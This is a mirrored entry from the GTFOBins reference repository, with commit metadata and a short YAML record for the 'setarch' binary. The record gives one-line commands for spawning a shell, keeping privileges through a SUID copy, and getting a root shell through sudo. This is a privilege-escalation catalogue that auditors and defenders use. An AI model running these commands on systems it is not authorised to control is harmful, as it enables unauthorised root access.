mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
0a42ec3171
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
245 B
245 B
description:
uname -m
can be used in place of arch
to obtain the architecture.
functions:
shell:
- code: setarch $(arch) /bin/sh
suid:
- code: ./setarch $(arch) /bin/sh -p
sudo:
- code: sudo setarch $(arch) /bin/sh